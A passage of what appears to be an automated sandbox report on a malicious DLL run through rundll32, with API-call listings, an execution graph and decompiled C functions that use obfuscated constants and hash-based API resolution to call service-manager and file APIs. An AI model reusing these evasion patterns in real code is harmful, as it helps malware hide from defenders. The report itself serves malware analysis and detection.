                                                                                                                      • InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                      • LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3253506028-0
                                                                                                                      • Opcode ID: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                      • Instruction ID: 3404b174272e1aedd22e2de365cf3e448d28d784c73140ac4aa41e98356ae93e
                                                                                                                      • Opcode Fuzzy Hash: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                      • Instruction Fuzzy Hash: 5AF0907350031A9BDB10DB58FC88B1AB6AAFB96355F870816F64582123EB3264C48A61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206D1
                                                                                                                      • TlsGetValue.KERNEL32 ref: 100206E6
                                                                                                                      • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206FC
                                                                                                                      • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020707
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$Leave$EnterValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3969253408-0
                                                                                                                      • Opcode ID: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                      • Instruction ID: 186a6cd651b3b82d4df79f5272d157dd9dcdda25cd8a7682fbe975f35e4e1d68
                                                                                                                      • Opcode Fuzzy Hash: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                      • Instruction Fuzzy Hash: 51F0FE76604720DFD320CF64DD8880B73ABEB8925135A9555F842D3123E630F8058F61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:16.2%
                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:1078
                                                                                                                      Total number of Limit Nodes:15
4799 230d15 4800 22f88a GetPEB 4799->4800 4802 230d13 4800->4802 4801 238d71 GetPEB 4801->4804 4802->4085 4803 234eff GetPEB 4803->4804 4804->4799 4804->4801 4804->4802 4804->4803 4805 23e713 GetPEB 4804->4805 4805->4804 4807 228c4b 4806->4807 4808 229700 3 API calls 4807->4808 4809 2412a8 GetPEB 4807->4809 4810 228d8a 4807->4810 4811 234fa8 GetPEB 4807->4811 4812 228650 GetPEB 4807->4812 4813 22ab66 2 API calls 4807->4813 4814 22e7ce GetPEB 4807->4814 4815 22ae03 GetPEB 4807->4815 4816 23c38f 3 API calls 4807->4816 4808->4807 4809->4807 4810->4085 4811->4807 4812->4807 4813->4807 4814->4807 4815->4807 4816->4807 4818 22f89d 4817->4818 4821 225961 4818->4821 4822 22597e 4821->4822 4823 222d9f GetPEB 4822->4823 4824 2259f7 4823->4824 4824->4723 4826 234f24 4825->4826 4827 222d9f GetPEB 4826->4827 4828 234f95 4827->4828 4828->4729 4830 238d8c 4829->4830 4831 238fc8 4830->4831 4842 22b0da 4830->4842 4831->4729 4834 23fd29 GetPEB 4835 238f83 4834->4835 4835->4831 4836 23fd29 GetPEB 4835->4836 4836->4835 4840 23e72b 4837->4840 4838 23e875 4838->4729 4839 23f949 GetPEB 4839->4840 4840->4838 4840->4839 4846 23d20a 4840->4846 4843 22b0f7 4842->4843 4844 222d9f GetPEB 4843->4844 4845 22b172 4844->4845 4845->4831 4845->4834 4847 23d220 4846->4847 4848 222d9f GetPEB 4847->4848 4849 23d29a 4848->4849 4849->4840 4851 228664 4850->4851 4852 225ae2 GetPEB 4851->4852 4853 228710 4852->4853 4853->4742 4855 23c3a8 4854->4855 4856 23c64b 4855->4856 4857 23c649 4855->4857 4860 23e938 2 API calls 4855->4860 4861 22eeb8 4855->4861 4858 234dad 2 API calls 4856->4858 4857->4742 4858->4857 4860->4855 4862 22eed9 4861->4862 4863 222d9f GetPEB 4862->4863 4864 22ef5a 4863->4864 4864->4855 4866 222d9f GetPEB 4865->4866 4867 23903c 4866->4867 4867->4757 4869 225ee9 4868->4869 4870 222d9f GetPEB 4869->4870 4871 225f68 4870->4871 4871->4757 4877 2277a8 4872->4877 4873 227a1d 4874 23f88f GetPEB 4873->4874 4875 227a1b 4874->4875 4875->4757 4876 233512 2 API calls 4876->4877 4877->4873 4877->4875 
4877->4876 4879 23d3a0 4878->4879 4880 22c1dc GetPEB 4879->4880 4881 23d3c0 4880->4881 4881->4757 4884 23367d 4882->4884 4883 241310 GetPEB 4883->4884 4884->4883 4885 233b1e 4884->4885 4887 22ab66 2 API calls 4884->4887 4889 233b1c 4884->4889 4891 22ae03 GetPEB 4884->4891 4903 235b0e 4884->4903 4907 23c8bd 4884->4907 4911 226e34 4885->4911 4887->4884 4889->4775 4891->4884 4893 222d9f GetPEB 4892->4893 4894 2296f7 4893->4894 4894->4775 4898 22b43c 4895->4898 4899 22b615 4898->4899 4900 229685 GetPEB 4898->4900 4902 22b62e 4898->4902 4915 2413b1 4898->4915 4919 23fb2b 4898->4919 4901 234dad 2 API calls 4899->4901 4900->4898 4901->4902 4902->4775 4904 235b28 4903->4904 4905 222d9f GetPEB 4904->4905 4906 235ba3 4905->4906 4906->4884 4908 23c8fa 4907->4908 4909 222d9f GetPEB 4908->4909 4910 23c986 4909->4910 4910->4884 4912 226e4a 4911->4912 4913 222d9f GetPEB 4912->4913 4914 226ecb 4913->4914 4914->4889 4916 2413db 4915->4916 4917 222d9f GetPEB 4916->4917 4918 241455 4917->4918 4918->4898 4920 23fb44 4919->4920 4921 222d9f GetPEB 4920->4921 4922 23fbc1 4921->4922 4922->4898 4924 2287b5 4923->4924 4925 222d9f GetPEB 4924->4925 4926 22882f 4925->4926 4926->4092 4928 23c2fa 4927->4928 4929 222d9f GetPEB 4928->4929 4930 23c375 4929->4930 4930->4092 4932 227b0e 4931->4932 4933 222d9f GetPEB 4932->4933 4934 227b76 4933->4934 4934->4096 4936 221973 4935->4936 4937 223bf8 GetPEB 4936->4937 4939 221f7e 4936->4939 4941 221f7c 4936->4941 4943 22ab66 RtlAllocateHeap GetPEB 4936->4943 4944 22e7ce GetPEB 4936->4944 4945 221950 2 API calls 4936->4945 4946 22ae03 GetPEB 4936->4946 4947 23f7fc 4936->4947 4951 23baea 4936->4951 4937->4936 4955 238c35 4939->4955 4941->4107 4943->4936 4944->4936 4945->4936 4946->4936 4948 23f812 4947->4948 4949 222d9f GetPEB 4948->4949 4950 23f881 4949->4950 4950->4936 4952 23bb04 4951->4952 4953 222d9f GetPEB 4952->4953 4954 23bba3 4953->4954 4954->4936 4956 238c4e 4955->4956 4957 222d9f GetPEB 4956->4957 4958 238ccb 4957->4958 4958->4941 4960 223da3 
4959->4960 4961 222d9f GetPEB 4960->4961 4962 223e1f 4961->4962 4962->4123 4964 235a75 4963->4964 4965 222d9f GetPEB 4964->4965 4966 235b03 4965->4966 4966->4123 4968 23a17e 4967->4968 4969 23a3cc 4968->4969 4971 23a3ca 4968->4971 4979 233f73 4968->4979 4970 22bb4b 2 API calls 4969->4970 4972 23a3e2 4970->4972 4971->4127 4983 22f154 4972->4983 4978 22ae03 GetPEB 4978->4971 4980 233f89 4979->4980 4981 222d9f GetPEB 4980->4981 4982 234007 4981->4982 4982->4968 4992 225c03 4983->4992 4987 22f2b6 4988 23d1c1 4987->4988 4989 23d1e5 4988->4989 4990 22c1dc GetPEB 4989->4990 4991 23a409 4990->4991 4991->4978 4993 225c1d 4992->4993 4994 222d9f GetPEB 4993->4994 4995 225c8b 4994->4995 4995->4987 4996 22884a 4995->4996 4997 228877 4996->4997 4998 222d9f GetPEB 4997->4998 4999 2288de 4998->4999 4999->4987 5003 2410a9 5000->5003 5001 22ab66 2 API calls 5001->5003 5002 233512 2 API calls 5002->5003 5003->5001 5003->5002 5004 23bdb5 GetPEB 5003->5004 5005 24126e 5003->5005 5007 22ae03 GetPEB 5003->5007 5009 241287 5003->5009 5018 23eae6 5003->5018 5004->5003 5008 2268de GetPEB 5005->5008 5007->5003 5008->5009 5009->4137 5011 23ee25 5010->5011 5022 230d33 5011->5022 5015 226e11 5014->5015 5016 226e2f 5014->5016 5015->5016 5017 2268de GetPEB 5015->5017 5016->4137 5017->5015 5019 23eb05 5018->5019 5020 233512 2 API calls 5019->5020 5021 23ebb1 5020->5021 5021->5003 5021->5021 5023 230d4d 5022->5023 5026 230ead 5023->5026 5029 230eab 5023->5029 5030 233512 2 API calls 5023->5030 5031 23acd3 5023->5031 5041 243672 5023->5041 5046 229a7d 5023->5046 5028 2268de GetPEB 5026->5028 5028->5029 5029->4137 5030->5023 5032 23b1d7 5031->5032 5033 22ab66 RtlAllocateHeap GetPEB 5032->5033 5034 23b1ff 5032->5034 5037 23b38c 5032->5037 5039 22ae03 GetPEB 5032->5039 5040 230eda GetPEB 5032->5040 5063 23f9e2 5032->5063 5033->5032 5036 227027 GetPEB 5034->5036 5038 23b220 5036->5038 5037->5037 5038->5023 5039->5032 5040->5032 5067 23e884 5041->5067 5044 2268de GetPEB 5045 243775 5044->5045 5045->5023 
5059 22a69f 5046->5059 5047 22ab66 RtlAllocateHeap GetPEB 5047->5059 5049 22ab36 5051 227027 GetPEB 5049->5051 5054 22ab34 5051->5054 5054->5023 5055 234e64 GetPEB 5055->5059 5056 230eda GetPEB 5056->5059 5057 23e884 GetPEB 5057->5059 5059->5047 5059->5049 5059->5054 5059->5055 5059->5056 5059->5057 5060 22ae03 GetPEB 5059->5060 5061 23fd29 GetPEB 5059->5061 5062 23f9e2 GetPEB 5059->5062 5071 23d76f 5059->5071 5075 225fe2 5059->5075 5079 223e2a 5059->5079 5083 22cfce 5059->5083 5098 22f0a0 5059->5098 5060->5059 5061->5059 5062->5059 5064 23fa0f 5063->5064 5065 222d9f GetPEB 5064->5065 5066 23fa7d 5065->5066 5066->5032 5068 23e897 5067->5068 5069 222d9f GetPEB 5068->5069 5070 23e92c 5069->5070 5070->5044 5072 23d785 5071->5072 5073 222d9f GetPEB 5072->5073 5074 23d7fe 5073->5074 5074->5059 5076 226004 5075->5076 5077 222d9f GetPEB 5076->5077 5078 226070 5077->5078 5078->5059 5080 223e5a 5079->5080 5081 222d9f GetPEB 5080->5081 5082 223ee1 5081->5082 5082->5059 5091 22dd8e 5083->5091 5084 22e107 5089 227027 GetPEB 5084->5089 5086 2268de GetPEB 5086->5091 5087 23fbcf GetPEB 5087->5091 5088 22e23e 5088->5088 5092 22e125 5089->5092 5090 233512 2 API calls 5090->5091 5091->5084 5091->5086 5091->5087 5091->5088 5091->5090 5093 230eda GetPEB 5091->5093 5094 22ab66 RtlAllocateHeap GetPEB 5091->5094 5095 23ba68 GetPEB 5091->5095 5097 22ae03 GetPEB 5091->5097 5102 225c98 5091->5102 5106 234016 5091->5106 5092->5059 5093->5091 5094->5091 5095->5091 5097->5091 5099 22f0bc 5098->5099 5100 222d9f GetPEB 5099->5100 5101 22f13f 5100->5101 5101->5059 5103 225cc3 5102->5103 5104 222d9f GetPEB 5103->5104 5105 225d47 5104->5105 5105->5091 5107 23404d 5106->5107 5108 222d9f GetPEB 5107->5108 5109 2340d3 5108->5109 5109->5091 5111 22c693 5110->5111 5112 222d9f GetPEB 5111->5112 5113 22c6fb 5112->5113 5113->4143 5115 231215 5114->5115 5116 222d9f GetPEB 5115->5116 5117 23128e 5116->5117 5117->4169 5119 225b7e 5118->5119 5120 222d9f GetPEB 5119->5120 5121 2243d9 5120->5121 5121->3938 5123 
224522 5122->5123 5125 224704 5123->5125 5127 224702 5123->5127 5128 241310 GetPEB 5123->5128 5138 22ac8c 5123->5138 5142 239045 5125->5142 5127->4186 5128->5123 5135 23448f 5129->5135 5131 2345a5 5132 227af8 GetPEB 5131->5132 5133 2345a3 5132->5133 5133->4186 5134 22ab66 2 API calls 5134->5135 5135->5131 5135->5133 5135->5134 5136 228786 GetPEB 5135->5136 5137 22ae03 GetPEB 5135->5137 5146 22efa6 5135->5146 5136->5135 5137->5135 5139 22aca9 5138->5139 5140 222d9f GetPEB 5139->5140 5141 22ad23 5140->5141 5141->5123 5143 239062 5142->5143 5144 222d9f GetPEB 5143->5144 5145 2390c7 5144->5145 5145->5127 5147 22efbf 5146->5147 5148 222d9f GetPEB 5147->5148 5149 22f051 5148->5149 5149->5135 5150 23d80c 5151 23d8a5 5150->5151 5152 23d8cc 5150->5152 5156 235cf9 5151->5156 5155 233cbb 2 API calls 5155->5152 5166 236288 5156->5166 5157 23648d 5159 229700 3 API calls 5157->5159 5158 23e35a GetPEB 5158->5166 5160 23648b 5159->5160 5160->5152 5160->5155 5161 22ea7b 2 API calls 5161->5166 5162 241310 GetPEB 5162->5166 5163 22ab66 RtlAllocateHeap GetPEB 5163->5166 5164 2412a8 GetPEB 5164->5166 5166->5157 5166->5158 5166->5160 5166->5161 5166->5162 5166->5163 5166->5164 5167 22e7ce GetPEB 5166->5167 5168 22ae03 GetPEB 5166->5168 5169 23fc96 5166->5169 5167->5166 5168->5166 5170 23fcac 5169->5170 5171 222d9f GetPEB 5170->5171 5172 23fd1a lstrcmpiW 5171->5172 5172->5166

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 462 22ea7b-22eb35 call 22cf25 call 222d9f SHGetFolderPathW
                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E0022EA7B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _t41;
                                                                                                                      				intOrPtr* _t50;
                                                                                                                      				void* _t51;
                                                                                                                      				signed int _t52;
                                                                                                                      				signed int _t53;
                                                                                                                      				void* _t60;
                                                                                                                      
                                                                                                                      				_t60 = __edx;
                                                                                                                      				E0022CF25(_t41);
                                                                                                                      				_v16 = 0xd33285;
                                                                                                                      				_v16 = _v16 + 0xd9cb;
                                                                                                                      				_v16 = _v16 | 0xd94823ae;
                                                                                                                      				_v16 = _v16 ^ 0xd9d95ea2;
                                                                                                                      				_v8 = 0xf9f040;
                                                                                                                      				_v8 = _v8 ^ 0x026675a4;
                                                                                                                      				_t52 = 0x46;
                                                                                                                      				_v8 = _v8 / _t52;
                                                                                                                      				_t53 = 0x2b;
                                                                                                                      				_v8 = _v8 / _t53;
                                                                                                                      				_v8 = _v8 ^ 0x000f054e;
                                                                                                                      				_v12 = 0x255c2b;
                                                                                                                      				_v12 = _v12 ^ 0x0b9b7933;
                                                                                                                      				_v12 = _v12 + 0xffff1ebc;
                                                                                                                      				_v12 = _v12 ^ 0x0bb758ac;
                                                                                                                      				_t50 = E00222D9F(0x111af765, 0x1c, _t53, 0xe4d0349b);
                                                                                                                      				_t51 =  *_t50(0, _a8, 0, 0, _t60, 0, __edx, _a4, _a8, 0, _a16, _a20, _a24, 0); // executed
                                                                                                                      				return _t51;
                                                                                                                      			}













                                                                                                                      APIs
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,D9D95EA2,00000000,00000000,?), ref: 0022EB2E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.521755216.0000000000220000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.521781158.0000000000245000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID: +\%
                                                                                                                      • API String ID: 1514166925-2522068492
                                                                                                                      • Opcode ID: 330e92cc225222d78e9e6c648ddc1dce5f76f2eb2b005bdd55b658b133651eb5
                                                                                                                      • Instruction ID: 99ae01faec249922cabcbcc00fd16b97ef87075186093eb2a0fc07e48dd95eec
                                                                                                                      • Opcode Fuzzy Hash: 330e92cc225222d78e9e6c648ddc1dce5f76f2eb2b005bdd55b658b133651eb5
                                                                                                                      • Instruction Fuzzy Hash: 37116736D00208FBDB14DEE6DA4A8DFBFB5EB85310F108099F514A6251E7714B65AF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 467 22eb36-22ebf1 call 22cf25 call 222d9f OpenSCManagerW
                                                                                                                      C-Code - Quality: 68%
                                                                                                                      			E0022EB36(void* __ecx, intOrPtr _a4, int _a12) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _v28;
                                                                                                                      				intOrPtr _v32;
                                                                                                                      				void* _t40;
                                                                                                                      				void* _t52;
                                                                                                                      				signed int _t54;
                                                                                                                      				signed int _t55;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(0);
                                                                                                                      				E0022CF25(_t40);
                                                                                                                      				_v32 = 0xf43dc;
                                                                                                                      				asm("stosd");
                                                                                                                      				asm("stosd");
                                                                                                                      				_t54 = 0x7c;
                                                                                                                      				asm("stosd");
                                                                                                                      				_v12 = 0x784be4;
                                                                                                                      				_t6 =  &_v12; // 0x784be4
                                                                                                                      				_t55 = 0x36;
                                                                                                                      				_v12 =  *_t6 / _t54;
                                                                                                                      				_v12 = _v12 + 0x9f6a;
                                                                                                                      				_v12 = _v12 * 0x31;
                                                                                                                      				_v12 = _v12 ^ 0x004694cb;
                                                                                                                      				_v8 = 0x884396;
                                                                                                                      				_v8 = _v8 << 2;
                                                                                                                      				_v8 = _v8 ^ 0x1535ea2d;
                                                                                                                      				_v8 = _v8 | 0xb4c8309a;
                                                                                                                      				_v8 = _v8 ^ 0xb7dc5be9;
                                                                                                                      				_v16 = 0x9578bf;
                                                                                                                      				_v16 = _v16 / _t55;
                                                                                                                      				_v16 = _v16 ^ 0x000e2a9d;
                                                                                                                      				E00222D9F(0xcb6a962, 0x1f4, _t55, 0x1b74c9e2);
                                                                                                                      				_t52 = OpenSCManagerW(0, 0, _a12); // executed
                                                                                                                      				return _t52;
                                                                                                                      			}













                                                                                                                      APIs
                                                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 0022EBEA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.521755216.0000000000220000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.521781158.0000000000245000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ManagerOpen
                                                                                                                      • String ID: Kx
                                                                                                                      • API String ID: 1889721586-2841836380
                                                                                                                      • Opcode ID: 41dff3092bc1f63532a7cccec9612a866476fb4b2cab239042f705f6c49823a2
                                                                                                                      • Instruction ID: d2bc6eca96b22a849ec2c2cb028eec458d4ea7157737fa95a5e40f60d1d44e21
                                                                                                                      • Opcode Fuzzy Hash: 41dff3092bc1f63532a7cccec9612a866476fb4b2cab239042f705f6c49823a2
                                                                                                                      • Instruction Fuzzy Hash: A1115671D05208FBDB14EFE6D84A9DEBFB5EF44310F208099E504B6250D7B95B14CB91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E00225D65(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _t31;
                                                                                                                      				intOrPtr* _t38;
                                                                                                                      				void* _t39;
                                                                                                                      				void* _t42;
                                                                                                                      
                                                                                                                      				_t42 = __edx;
                                                                                                                      				E0022CF25(_t31);
                                                                                                                      				_v12 = 0x1c122d;
                                                                                                                      				_v12 = _v12 * 0x6a;
                                                                                                                      				_v12 = _v12 ^ 0xecdd50d1;
                                                                                                                      				_v12 = _v12 ^ 0xe74257e3;
                                                                                                                      				_v16 = 0xd55139;
                                                                                                                      				_v16 = _v16 + 0xd07c;
                                                                                                                      				_v16 = _v16 ^ 0x00d6881e;
                                                                                                                      				_v8 = 0x156dc9;
                                                                                                                      				_v8 = _v8 * 0x43;
                                                                                                                      				_v8 = _v8 ^ 0x03beef10;
                                                                                                                      				_v8 = _v8 + 0xffffe13f;
                                                                                                                      				_v8 = _v8 ^ 0x06271f08;
                                                                                                                      				_t38 = E00222D9F(0x4ef88dcb, 0x31, __ecx, 0xa62ab78c);
                                                                                                                      				_t39 =  *_t38(_t42, 0, _a12, 0x28, 0x28, __edx, _a4, 0, _a12, _a16, _a20, _a24); // executed
                                                                                                                      				return _t39;
                                                                                                                      			}











                                                                                                                      APIs
                                                                                                                      • SetFileInformationByHandle.KERNEL32(?,00000000,?,00000028), ref: 00225E04
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.521755216.0000000000220000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.521781158.0000000000245000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileHandleInformation
                                                                                                                      • String ID: WB
                                                                                                                      • API String ID: 3935143524-2158411504
                                                                                                                      • Opcode ID: 43935c843aae4829611c0686b053fedb4fd8e6d3d3521d64be353873fdee31cf
                                                                                                                      • Instruction ID: 17ab7ca66fdad07ce1bc09a6b1854ffdb8e2a7ec0cd74238c3a30275e455ab46
                                                                                                                      • Opcode Fuzzy Hash: 43935c843aae4829611c0686b053fedb4fd8e6d3d3521d64be353873fdee31cf
                                                                                                                      • Instruction Fuzzy Hash: 84111376C01208FBDB10DFA4D946ACEBFB4AB14300F208089F9106A2A4DBB15B64AF81
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 477 23e689-23e712 call 22cf25 call 222d9f CloseServiceHandle
                                                                                                                      C-Code - Quality: 73%
                                                                                                                      			E0023E689(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
                                                                                                                      				unsigned int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _t27;
                                                                                                                      				int _t34;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0022CF25(_t27);
                                                                                                                      				_v8 = 0x8d6642;
                                                                                                                      				_v8 = _v8 >> 0xa;
                                                                                                                      				_v8 = _v8 + 0x9ccb;
                                                                                                                      				_v8 = _v8 >> 0xd;
                                                                                                                      				_v8 = _v8 ^ 0x0002819d;
                                                                                                                      				_v16 = 0x6a74c5;
                                                                                                                      				_v16 = _v16 | 0x354c93f6;
                                                                                                                      				_v16 = _v16 ^ 0x356d05ed;
                                                                                                                      				_v12 = 0xe812c4;
                                                                                                                      				_v12 = _v12 * 0x26;
                                                                                                                      				_v12 = _v12 ^ 0x227e2d65;
                                                                                                                      				E00222D9F(0x23833043, 0x1ec, __ecx, 0x1b74c9e2);
                                                                                                                      				_t34 = CloseServiceHandle(_a8); // executed
                                                                                                                      				return _t34;
                                                                                                                      			}









                                                                                                                      APIs
                                                                                                                      • CloseServiceHandle.ADVAPI32(356D05ED), ref: 0023E70D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.521755216.0000000000220000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.521781158.0000000000245000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleService
                                                                                                                      • String ID: e-~"
                                                                                                                      • API String ID: 1725840886-2046105602
                                                                                                                      • Opcode ID: c1046b7ecd956da74b7a5d1762cebc86866113f0b369af2bd128aca44436a943
                                                                                                                      • Instruction ID: e464ea64a41faabec52af4ddf0617924cf074eb0b2738b959cd14373128df1e7
                                                                                                                      • Opcode Fuzzy Hash: c1046b7ecd956da74b7a5d1762cebc86866113f0b369af2bd128aca44436a943
                                                                                                                      • Instruction Fuzzy Hash: 3901E271C0020CFBCB08EFE4D98689EBFB4EB54304F208189E928A6255D7B5AB649F50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 482 234dad-234e63 call 22cf25 call 222d9f CloseHandle
                                                                                                                      C-Code - Quality: 72%
                                                                                                                      			E00234DAD(void* __ecx, void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				signed int _v8;
                                                                                                                      				unsigned int _v12;
                                                                                                                      				unsigned int _v16;
                                                                                                                      				void* _v28;
                                                                                                                      				intOrPtr _v32;
                                                                                                                      				void* _t41;
                                                                                                                      				int _t50;
                                                                                                                      				signed int _t52;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				E0022CF25(_t41);
                                                                                                                      				_v32 = 0xb76b6b;
                                                                                                                      				asm("stosd");
                                                                                                                      				asm("stosd");
                                                                                                                      				_t52 = 0x74;
                                                                                                                      				asm("stosd");
                                                                                                                      				_v16 = 0xdf8814;
                                                                                                                      				_v16 = _v16 | 0xf44f2943;
                                                                                                                      				_v16 = _v16 << 6;
                                                                                                                      				_v16 = _v16 >> 5;
